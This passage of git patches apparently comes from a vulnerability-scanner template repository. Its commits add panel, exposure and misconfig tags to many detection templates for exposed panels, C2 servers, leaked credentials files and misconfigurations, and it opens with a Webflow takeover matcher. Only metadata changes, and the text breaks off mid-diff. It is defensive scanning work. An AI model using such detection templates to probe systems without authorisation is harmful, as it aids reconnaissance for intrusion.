webflow-takeover info: name: webflow takeover detection - author: pdteam + author: pdteam, keni0k severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz @@ -23,4 +23,6 @@ http: - type: word words: - -

The page you are looking for doesn't exist or has been moved.

\ No newline at end of file + -

The page you are looking doesn't exist or has been moved.

+ - webflow + condition: and From 6697246893dd8e1ae46af06bdaf26bbddf634d11 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:19:52 -0700 Subject: [PATCH 131/609] add exposed-panel tag to templates in http/exposed-panels --- http/exposed-panels/arcgis/arcgis-rest-api.yaml | 2 +- http/exposed-panels/avtech-dvr-exposure.yaml | 2 +- http/exposed-panels/c2/cobalt-strike-c2.yaml | 2 +- http/exposed-panels/c2/covenant-c2.yaml | 2 +- http/exposed-panels/c2/deimos-c2.yaml | 2 +- http/exposed-panels/c2/metasploit-c2.yaml | 2 +- http/exposed-panels/c2/mythic-c2.yaml | 2 +- http/exposed-panels/hashicorp-consul-agent.yaml | 2 +- http/exposed-panels/kubeview-dashboard.yaml | 2 +- http/exposed-panels/neo4j-browser.yaml | 2 +- http/exposed-panels/openwrt-login.yaml | 2 +- http/exposed-panels/pulse-secure-version.yaml | 2 +- http/exposed-panels/synology-rackstation-login.yaml | 2 +- http/exposed-panels/tomcat/tomcat-exposed-docs.yaml | 2 +- http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml | 2 +- http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml | 2 +- 16 files changed, 16 insertions(+), 16 deletions(-) diff --git a/http/exposed-panels/arcgis/arcgis-rest-api.yaml b/http/exposed-panels/arcgis/arcgis-rest-api.yaml index ed1d703e42..d5855b0c0a 100644 --- a/http/exposed-panels/arcgis/arcgis-rest-api.yaml +++ b/http/exposed-panels/arcgis/arcgis-rest-api.yaml @@ -9,7 +9,7 @@ info: - https://enterprise.arcgis.com/en/ classification: cwe-id: CWE-200 - tags: api,arcgis,cms + tags: api,arcgis,cms,panel metadata: max-request: 1 diff --git a/http/exposed-panels/avtech-dvr-exposure.yaml b/http/exposed-panels/avtech-dvr-exposure.yaml index 10819c057d..7518cbd5aa 100644 --- a/http/exposed-panels/avtech-dvr-exposure.yaml +++ b/http/exposed-panels/avtech-dvr-exposure.yaml @@ -7,7 +7,7 @@ info: description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - http://www.avtech.com.tw/ - tags: dvr,exposure,avtech + tags: dvr,exposure,avtech,panel metadata: max-request: 1 diff --git a/http/exposed-panels/c2/cobalt-strike-c2.yaml b/http/exposed-panels/c2/cobalt-strike-c2.yaml index 0ce1273491..21fb1efdb9 100644 --- a/http/exposed-panels/c2/cobalt-strike-c2.yaml +++ b/http/exposed-panels/c2/cobalt-strike-c2.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: ssl.cert.serial:146473198 - tags: ssl,c2,ir,osint + tags: ssl,c2,ir,osint,panel ssl: - address: "{{Host}}:{{Port}}" diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index b2616a0059..557d721e0d 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: ssl:”Covenant” http.component:”Blazor” - tags: c2,ir,osint,covenant + tags: c2,ir,osint,covenant,panel http: - method: GET diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index 19bc1d13c1..192448d3d3 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.html_hash:-14029177 - tags: c2,ir,osint,deimosc2 + tags: c2,ir,osint,deimosc2,panel http: - method: GET diff --git a/http/exposed-panels/c2/metasploit-c2.yaml b/http/exposed-panels/c2/metasploit-c2.yaml index ae5f9a5723..93a905d05e 100644 --- a/http/exposed-panels/c2/metasploit-c2.yaml +++ b/http/exposed-panels/c2/metasploit-c2.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: ssl:"MetasploitSelfSignedCA" - tags: c2,ir,osint,metasploit + tags: c2,ir,osint,metasploit,panel ssl: - address: "{{Host}}:{{Port}}" diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index 85951cd9ec..c413d05414 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: 'ssl:Mythic port:7443' - tags: c2,ir,osint,mythic + tags: c2,ir,osint,mythic,panel http: - method: GET diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index ace7237627..227da1ea1a 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,consul,api + tags: tech,consul,api,panel metadata: max-request: 1 diff --git a/http/exposed-panels/kubeview-dashboard.yaml b/http/exposed-panels/kubeview-dashboard.yaml index 2fb91135f0..8b840e2a24 100644 --- a/http/exposed-panels/kubeview-dashboard.yaml +++ b/http/exposed-panels/kubeview-dashboard.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-379154636 - tags: exposure,k8s,kubernetes,kubeview,dashboard + tags: exposure,k8s,kubernetes,kubeview,dashboard,panel http: - method: GET diff --git a/http/exposed-panels/neo4j-browser.yaml b/http/exposed-panels/neo4j-browser.yaml index bb1ef67c3a..043f021cbc 100644 --- a/http/exposed-panels/neo4j-browser.yaml +++ b/http/exposed-panels/neo4j-browser.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Neo4j Browser" - tags: neo4j,exposure,unauth + tags: neo4j,exposure,unauth,panel http: - method: GET diff --git a/http/exposed-panels/openwrt-login.yaml b/http/exposed-panels/openwrt-login.yaml index 3243613ac5..d5f773d5b5 100644 --- a/http/exposed-panels/openwrt-login.yaml +++ b/http/exposed-panels/openwrt-login.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"OpenWrt - LuCI" - tags: openwrt,router + tags: openwrt,router,panel http: - method: GET diff --git a/http/exposed-panels/pulse-secure-version.yaml b/http/exposed-panels/pulse-secure-version.yaml index 0eba26a766..d3594a6e90 100644 --- a/http/exposed-panels/pulse-secure-version.yaml +++ b/http/exposed-panels/pulse-secure-version.yaml @@ -4,7 +4,7 @@ info: name: Pulse Secure Version author: dadevel severity: info - tags: pulse + tags: pulse,panel metadata: max-request: 2 diff --git a/http/exposed-panels/synology-rackstation-login.yaml b/http/exposed-panels/synology-rackstation-login.yaml index dc96b479d9..0c94022c1c 100644 --- a/http/exposed-panels/synology-rackstation-login.yaml +++ b/http/exposed-panels/synology-rackstation-login.yaml @@ -4,7 +4,7 @@ info: name: Synology RackStation Login Detect author: princechaddha severity: info - tags: login,tech,synology,rackstation + tags: login,tech,synology,rackstation,panel metadata: max-request: 1 diff --git a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml b/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml index a00fc81b57..27e2449115 100644 --- a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml +++ b/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Apache Tomcat" - tags: version,tomcat,docs + tags: version,tomcat,docs,panel http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index 2c0ecdfaa9..b4cf52424d 100644 --- a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"VMG1312-B10D" - tags: tech,zyxel,modem,router + tags: tech,zyxel,modem,router,panel http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 3df5adfb2a..96b9b99c8e 100644 --- a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"VSG1432-B101" - tags: tech,zyxel,modem,router + tags: tech,zyxel,modem,router,panel http: - method: GET From a85b495576333fbec43271df4d090c8498478355 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:20:14 -0700 Subject: [PATCH 132/609] add exposure tag to templates in http/exposures --- http/exposures/apis/strapi-page.yaml | 2 +- http/exposures/configs/azure-domain-tenant.yaml | 2 +- http/exposures/configs/esmtprc-config.yaml | 2 +- http/exposures/configs/jkstatus-manager.yaml | 2 +- http/exposures/configs/keycloak-openid-config.yaml | 2 +- http/exposures/configs/robomongo-credential.yaml | 2 +- http/exposures/configs/wpconfig-aws-keys.yaml | 2 +- http/exposures/files/gradle-libs.yaml | 2 +- http/exposures/files/jetbrains-webservers.yaml | 2 +- http/exposures/files/redmine-settings.yaml | 2 +- http/exposures/files/sensitive-storage-exposure.yaml | 2 +- http/exposures/logs/access-log.yaml | 2 +- http/exposures/logs/laravel-telescope.yaml | 2 +- 13 files changed, 13 insertions(+), 13 deletions(-) diff --git a/http/exposures/apis/strapi-page.yaml b/http/exposures/apis/strapi-page.yaml index a52f859721..5692d22054 100644 --- a/http/exposures/apis/strapi-page.yaml +++ b/http/exposures/apis/strapi-page.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to your Strapi app" - tags: api,strapi + tags: api,strapi,exposure http: - method: GET diff --git a/http/exposures/configs/azure-domain-tenant.yaml b/http/exposures/configs/azure-domain-tenant.yaml index 1abc887652..55c92705bb 100644 --- a/http/exposures/configs/azure-domain-tenant.yaml +++ b/http/exposures/configs/azure-domain-tenant.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: azure,microsoft,cloud + tags: azure,microsoft,cloud,exposure metadata: max-request: 1 diff --git a/http/exposures/configs/esmtprc-config.yaml b/http/exposures/configs/esmtprc-config.yaml index 2d5001ac5e..301446b0da 100644 --- a/http/exposures/configs/esmtprc-config.yaml +++ b/http/exposures/configs/esmtprc-config.yaml @@ -7,7 +7,7 @@ info: description: eSMTP configuration was discovered. reference: - https://linux.die.net/man/5/esmtprc - tags: esmtp,config + tags: esmtp,config,exposure metadata: max-request: 1 diff --git a/http/exposures/configs/jkstatus-manager.yaml b/http/exposures/configs/jkstatus-manager.yaml index 10150a6bc7..9a76c43284 100644 --- a/http/exposures/configs/jkstatus-manager.yaml +++ b/http/exposures/configs/jkstatus-manager.yaml @@ -10,7 +10,7 @@ info: max-request: 8 verified: true shodan-query: html:"JK Status Manager" - tags: config,jk,status + tags: config,jk,status,exposure http: - method: GET diff --git a/http/exposures/configs/keycloak-openid-config.yaml b/http/exposures/configs/keycloak-openid-config.yaml index 37818ee5a4..acae33dac6 100644 --- a/http/exposures/configs/keycloak-openid-config.yaml +++ b/http/exposures/configs/keycloak-openid-config.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: keycloak,config + tags: keycloak,config,exposure metadata: max-request: 2 diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index 4a3968f147..b01503f4c3 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 description: A MongoDB credentials file used by RoboMongo was detected. reference: https://robomongo.org/ - tags: mongodb,robomongo,disclosure,config + tags: mongodb,robomongo,disclosure,config,exposure metadata: max-request: 2 diff --git a/http/exposures/configs/wpconfig-aws-keys.yaml b/http/exposures/configs/wpconfig-aws-keys.yaml index f1f0838200..ca42c3dd2d 100644 --- a/http/exposures/configs/wpconfig-aws-keys.yaml +++ b/http/exposures/configs/wpconfig-aws-keys.yaml @@ -4,7 +4,7 @@ info: name: AWS S3 keys Leak author: r12w4n severity: high - tags: aws,s3,wordpress,disclosure + tags: aws,s3,wordpress,disclosure,exposure metadata: max-request: 2 diff --git a/http/exposures/files/gradle-libs.yaml b/http/exposures/files/gradle-libs.yaml index e044dfe90c..81e23bad6c 100644 --- a/http/exposures/files/gradle-libs.yaml +++ b/http/exposures/files/gradle-libs.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true github-query: filename:libs.versions.toml - tags: file,gradle + tags: file,gradle,exposure http: - method: GET diff --git a/http/exposures/files/jetbrains-webservers.yaml b/http/exposures/files/jetbrains-webservers.yaml index 4edb93e89d..1e2f93e0c0 100644 --- a/http/exposures/files/jetbrains-webservers.yaml +++ b/http/exposures/files/jetbrains-webservers.yaml @@ -16,7 +16,7 @@ info: max-request: 3 verified: true google-query: intitle:"index of" "WebServers.xml" - tags: jetbrains,config,edb,files + tags: jetbrains,config,edb,files,exposure http: - method: GET diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml index 3bc35b0a4d..de32c35036 100644 --- a/http/exposures/files/redmine-settings.yaml +++ b/http/exposures/files/redmine-settings.yaml @@ -9,7 +9,7 @@ info: max-request: 3 verified: true google-query: intitle:"index of" "settings.yml" - tags: misconfig,redmine,devops,files + tags: misconfig,redmine,devops,files,exposure http: - method: GET diff --git a/http/exposures/files/sensitive-storage-exposure.yaml b/http/exposures/files/sensitive-storage-exposure.yaml index e450a2f2ef..51b2a01870 100644 --- a/http/exposures/files/sensitive-storage-exposure.yaml +++ b/http/exposures/files/sensitive-storage-exposure.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: expose,listing,config,logs,storage,edb,files + tags: expose,listing,config,logs,storage,edb,files,exposure metadata: max-request: 6 diff --git a/http/exposures/logs/access-log.yaml b/http/exposures/logs/access-log.yaml index 613159894c..37b817a8c3 100644 --- a/http/exposures/logs/access-log.yaml +++ b/http/exposures/logs/access-log.yaml @@ -4,7 +4,7 @@ info: name: Publicly accessible access-log file author: sheikhrishad severity: low - tags: logs + tags: logs,exposure metadata: max-request: 4 diff --git a/http/exposures/logs/laravel-telescope.yaml b/http/exposures/logs/laravel-telescope.yaml index a19cf842f2..28e334a284 100644 --- a/http/exposures/logs/laravel-telescope.yaml +++ b/http/exposures/logs/laravel-telescope.yaml @@ -8,7 +8,7 @@ info: and more. reference: - https://laravel.com/docs/8.x/telescope - tags: laravel,disclosure,logs + tags: laravel,disclosure,logs,exposure metadata: max-request: 1 From 60bfcf0023d307c5094a5a7ea783dabde83205f2 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:20:49 -0700 Subject: [PATCH 133/609] add misconfig tag to templates in http/misconfiguration --- .../adobe/adobe-connect-username-exposure.yaml | 2 +- http/misconfiguration/adobe/adobe-connect-version.yaml | 2 +- http/misconfiguration/aem/aem-bg-servlet.yaml | 2 +- http/misconfiguration/aem/aem-cached-pages.yaml | 2 +- http/misconfiguration/aem/aem-childrenlist-xss.yaml | 2 +- http/misconfiguration/aem/aem-crx-bypass.yaml | 2 +- http/misconfiguration/aem/aem-crx-namespace.yaml | 2 +- http/misconfiguration/aem/aem-default-get-servlet.yaml | 2 +- http/misconfiguration/aem/aem-gql-servlet.yaml | 2 +- http/misconfiguration/aem/aem-groovyconsole.yaml | 2 +- http/misconfiguration/aem/aem-hash-querybuilder.yaml | 2 +- http/misconfiguration/aem/aem-jcr-querybuilder.yaml | 2 +- http/misconfiguration/aem/aem-login-status.yaml | 2 +- http/misconfiguration/aem/aem-merge-metadata-servlet.yaml | 2 +- http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml | 2 +- .../aem/aem-querybuilder-internal-path-read.yaml | 2 +- http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml | 2 +- http/misconfiguration/aem/aem-setpreferences-xss.yaml | 2 +- http/misconfiguration/aem/aem-userinfo-servlet.yaml | 2 +- http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml | 2 +- http/misconfiguration/aem/aem-xss-childlist-selector.yaml | 2 +- http/misconfiguration/airflow/airflow-debug.yaml | 2 +- http/misconfiguration/airflow/unauthenticated-airflow.yaml | 2 +- http/misconfiguration/akamai/akamai-arl-xss.yaml | 2 +- http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml | 3 ++- http/misconfiguration/alibaba-mongoshake-unauth.yaml | 2 +- http/misconfiguration/android-debug-database-exposed.yaml | 2 +- http/misconfiguration/apache/tomcat-pathnormalization.yaml | 2 +- http/misconfiguration/apc-info.yaml | 2 +- http/misconfiguration/artifactory-anonymous-deploy.yaml | 2 +- http/misconfiguration/aspx-debug-mode.yaml | 2 +- http/misconfiguration/aws-redirect.yaml | 2 +- http/misconfiguration/blackbox-exporter-metrics.yaml | 2 +- http/misconfiguration/browserless-debugger.yaml | 2 +- http/misconfiguration/cgi-test-page.yaml | 2 +- http/misconfiguration/clockwork-dashboard-exposure.yaml | 2 +- http/misconfiguration/cluster-panel.yaml | 2 +- http/misconfiguration/collectd-exporter-metrics.yaml | 2 +- http/misconfiguration/command-api-explorer.yaml | 2 +- http/misconfiguration/cx-cloud-upload-detect.yaml | 2 +- http/misconfiguration/d-link-arbitary-fileread.yaml | 2 +- http/misconfiguration/debug/bottle-debug.yaml | 2 +- http/misconfiguration/debug/flask-werkzeug-debug.yaml | 2 +- http/misconfiguration/deos-openview-admin.yaml | 2 +- http/misconfiguration/dgraph-dashboard-exposure.yaml | 2 +- http/misconfiguration/django-debug-detect.yaml | 2 +- http/misconfiguration/druid-monitor.yaml | 2 +- http/misconfiguration/drupal/drupal-user-enum-ajax.yaml | 2 +- http/misconfiguration/elasticsearch.yaml | 2 +- http/misconfiguration/everything-listing.yaml | 2 +- http/misconfiguration/exposed-docker-api.yaml | 2 +- http/misconfiguration/exposed-jquery-file-upload.yaml | 2 +- http/misconfiguration/exposed-kibana.yaml | 2 +- http/misconfiguration/git-web-interface.yaml | 2 +- http/misconfiguration/grafana-public-signup.yaml | 2 +- http/misconfiguration/graphql/graphql-alias-batching.yaml | 2 +- http/misconfiguration/graphql/graphql-array-batching.yaml | 2 +- http/misconfiguration/graphql/graphql-field-suggestion.yaml | 2 +- http/misconfiguration/graphql/graphql-get-method.yaml | 2 +- http/misconfiguration/hadoop-unauth-rce.yaml | 2 +- http/misconfiguration/haproxy-exporter-metrics.yaml | 2 +- http/misconfiguration/haproxy-status.yaml | 2 +- http/misconfiguration/hp/unauthorized-hp-printer.yaml | 2 +- http/misconfiguration/hp/unauthorized-printer-hp.yaml | 2 +- http/misconfiguration/hpe-system-management-anonymous.yaml | 2 +- http/misconfiguration/ibm-friendly-path-exposure.yaml | 2 +- http/misconfiguration/ibm-websphere-xml.yaml | 3 ++- http/misconfiguration/installer/avideo-install.yaml | 2 +- http/misconfiguration/installer/circarlife-setup.yaml | 2 +- http/misconfiguration/installer/getsimple-installation.yaml | 2 +- http/misconfiguration/installer/magnolia-installer.yaml | 2 +- http/misconfiguration/installer/mcloud-installer.yaml | 2 +- http/misconfiguration/installer/openshift-installer-panel.yaml | 2 +- http/misconfiguration/java-melody-exposed.yaml | 2 +- http/misconfiguration/jboss-status.yaml | 2 +- http/misconfiguration/jetty-showcontexts-enable.yaml | 2 +- http/misconfiguration/jolokia/jolokia-info-disclosure.yaml | 2 +- http/misconfiguration/jolokia/jolokia-list.yaml | 2 +- http/misconfiguration/jolokia/jolokia-mbean-search.yaml | 2 +- http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml | 2 +- http/misconfiguration/jupyter-ipython-unauth.yaml | 2 +- http/misconfiguration/kubeflow-dashboard-unauth.yaml | 2 +- http/misconfiguration/kubernetes/kubernetes-metrics.yaml | 2 +- http/misconfiguration/kubernetes/kubernetes-pods.yaml | 2 +- .../kubernetes/kubernetes-resource-report.yaml | 2 +- http/misconfiguration/kubernetes/unauth-etcd-server.yaml | 2 +- http/misconfiguration/laravel-debug-error.yaml | 2 +- http/misconfiguration/libvirt-exporter-metrics.yaml | 2 +- http/misconfiguration/liferay/liferay-api.yaml | 2 +- http/misconfiguration/liferay/liferay-jsonws.yaml | 2 +- http/misconfiguration/linkerd-ssrf-detect.yaml | 2 +- http/misconfiguration/lvm-exporter-metrics.yaml | 2 +- http/misconfiguration/manage-engine-ad-search.yaml | 2 +- http/misconfiguration/mlflow-unauth.yaml | 2 +- http/misconfiguration/mongodb-exporter-metrics.yaml | 2 +- http/misconfiguration/namedprocess-exporter-metrics.yaml | 2 +- http/misconfiguration/nextcloud-install.yaml | 2 +- http/misconfiguration/node-exporter-metrics.yaml | 2 +- http/misconfiguration/nomad-jobs.yaml | 2 +- http/misconfiguration/office365-open-redirect.yaml | 2 +- http/misconfiguration/openbmcs/openbmcs-ssrf.yaml | 2 +- http/misconfiguration/pghero-dashboard-exposure.yaml | 2 +- http/misconfiguration/php-errors.yaml | 2 +- http/misconfiguration/php-fpm-status.yaml | 2 +- http/misconfiguration/php-src-disclosure.yaml | 2 +- http/misconfiguration/pinpoint-unauth.yaml | 2 +- http/misconfiguration/postgres-exporter-metrics.yaml | 2 +- http/misconfiguration/private-key-exposure.yaml | 2 +- http/misconfiguration/prometheus/prometheus-config.yaml | 2 +- http/misconfiguration/prometheus/prometheus-exporter.yaml | 2 +- http/misconfiguration/prometheus/prometheus-flags.yaml | 2 +- http/misconfiguration/prometheus/prometheus-log.yaml | 2 +- http/misconfiguration/prometheus/prometheus-targets.yaml | 2 +- http/misconfiguration/put-method-enabled.yaml | 2 +- http/misconfiguration/python-metrics.yaml | 2 +- http/misconfiguration/rabbitmq-exporter-metrics.yaml | 2 +- http/misconfiguration/rack-mini-profiler.yaml | 2 +- http/misconfiguration/salesforce-aura.yaml | 2 +- http/misconfiguration/sap/sap-netweaver-info-leak.yaml | 2 +- http/misconfiguration/server-status-localhost.yaml | 2 +- http/misconfiguration/service-pwd.yaml | 2 +- http/misconfiguration/setup-github-enterprise.yaml | 2 +- http/misconfiguration/sitecore-debug-page.yaml | 2 +- http/misconfiguration/sitecore-lfi.yaml | 2 +- http/misconfiguration/solr-query-dashboard.yaml | 2 +- http/misconfiguration/spidercontrol-scada-server-info.yaml | 2 +- http/misconfiguration/springboot/springboot-autoconfig.yaml | 2 +- http/misconfiguration/springboot/springboot-beans.yaml | 2 +- http/misconfiguration/springboot/springboot-configprops.yaml | 2 +- http/misconfiguration/springboot/springboot-dump.yaml | 2 +- http/misconfiguration/springboot/springboot-gateway.yaml | 2 +- http/misconfiguration/springboot/springboot-health.yaml | 2 +- http/misconfiguration/springboot/springboot-heapdump.yaml | 2 +- http/misconfiguration/springboot/springboot-httptrace.yaml | 2 +- http/misconfiguration/springboot/springboot-info.yaml | 2 +- http/misconfiguration/springboot/springboot-loggers.yaml | 2 +- http/misconfiguration/springboot/springboot-mappings.yaml | 2 +- http/misconfiguration/springboot/springboot-metrics.yaml | 2 +- http/misconfiguration/springboot/springboot-threaddump.yaml | 2 +- http/misconfiguration/struts-ognl-console.yaml | 2 +- http/misconfiguration/symfony-debug.yaml | 2 +- http/misconfiguration/tcpconfig.yaml | 2 +- http/misconfiguration/unauthenticated-alert-manager.yaml | 2 +- http/misconfiguration/unauthenticated-glances.yaml | 2 +- http/misconfiguration/unauthenticated-lansweeper.yaml | 2 +- http/misconfiguration/unauthenticated-mongo-express.yaml | 2 +- http/misconfiguration/unauthenticated-nacos-access.yaml | 2 +- http/misconfiguration/unauthenticated-popup-upload.yaml | 2 +- http/misconfiguration/unauthenticated-prtg.yaml | 2 +- http/misconfiguration/unauthenticated-tensorboard.yaml | 2 +- http/misconfiguration/unauthenticated-zipkin.yaml | 2 +- http/misconfiguration/unauthorized-h3csecparh-login.yaml | 2 +- http/misconfiguration/unauthorized-plastic-scm.yaml | 2 +- http/misconfiguration/ups-status.yaml | 2 +- http/misconfiguration/viewpoint-system-status.yaml | 2 +- http/misconfiguration/wamp-server-configuration.yaml | 2 +- http/misconfiguration/wamp-xdebug-detect.yaml | 2 +- http/misconfiguration/webalizer-statistics.yaml | 2 +- http/misconfiguration/wildcard-postmessage.yaml | 2 +- http/misconfiguration/zabbix-dashboards-access.yaml | 2 +- http/misconfiguration/zhiyuan-oa-unauthorized.yaml | 2 +- 161 files changed, 163 insertions(+), 161 deletions(-) diff --git a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml index 6489b27f76..4526db494b 100644 --- a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml +++ b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - tags: adobe,disclosure,packetstorm + tags: adobe,disclosure,packetstorm,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/adobe/adobe-connect-version.yaml b/http/misconfiguration/adobe/adobe-connect-version.yaml index dcd77a12d1..8347d77db0 100644 --- a/http/misconfiguration/adobe/adobe-connect-version.yaml +++ b/http/misconfiguration/adobe/adobe-connect-version.yaml @@ -4,7 +4,7 @@ info: name: Adobe Connect Central Version author: dhiyaneshDk severity: info - tags: adobe + tags: adobe,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/aem/aem-bg-servlet.yaml b/http/misconfiguration/aem/aem-bg-servlet.yaml index 42dd291a9f..f93ce268f7 100644 --- a/http/misconfiguration/aem/aem-bg-servlet.yaml +++ b/http/misconfiguration/aem/aem-bg-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-cached-pages.yaml b/http/misconfiguration/aem/aem-cached-pages.yaml index 88cb41e16a..363422a14c 100644 --- a/http/misconfiguration/aem/aem-cached-pages.yaml +++ b/http/misconfiguration/aem/aem-cached-pages.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-childrenlist-xss.yaml b/http/misconfiguration/aem/aem-childrenlist-xss.yaml index e06a3957b5..717734becc 100644 --- a/http/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/http/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe + tags: xss,aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-bypass.yaml b/http/misconfiguration/aem/aem-crx-bypass.yaml index 52bb5c1a93..9181a6d9ee 100644 --- a/http/misconfiguration/aem/aem-crx-bypass.yaml +++ b/http/misconfiguration/aem/aem-crx-bypass.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,misconfig http: - raw: diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml index 81897ff482..c7b3fc1457 100644 --- a/http/misconfiguration/aem/aem-crx-namespace.yaml +++ b/http/misconfiguration/aem/aem-crx-namespace.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: exposure,aem,adobe + tags: exposure,aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-default-get-servlet.yaml b/http/misconfiguration/aem/aem-default-get-servlet.yaml index 290790ab25..ba3d2aa778 100644 --- a/http/misconfiguration/aem/aem-default-get-servlet.yaml +++ b/http/misconfiguration/aem/aem-default-get-servlet.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 64 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe + tags: aem,adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-gql-servlet.yaml b/http/misconfiguration/aem/aem-gql-servlet.yaml index f2cd068225..0db1bcebcf 100644 --- a/http/misconfiguration/aem/aem-gql-servlet.yaml +++ b/http/misconfiguration/aem/aem-gql-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 29 shodan-query: http.component:"Adobe Experience Manager" - tags: aem + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-groovyconsole.yaml b/http/misconfiguration/aem/aem-groovyconsole.yaml index b9b40ce79b..d817836dc9 100644 --- a/http/misconfiguration/aem/aem-groovyconsole.yaml +++ b/http/misconfiguration/aem/aem-groovyconsole.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" - 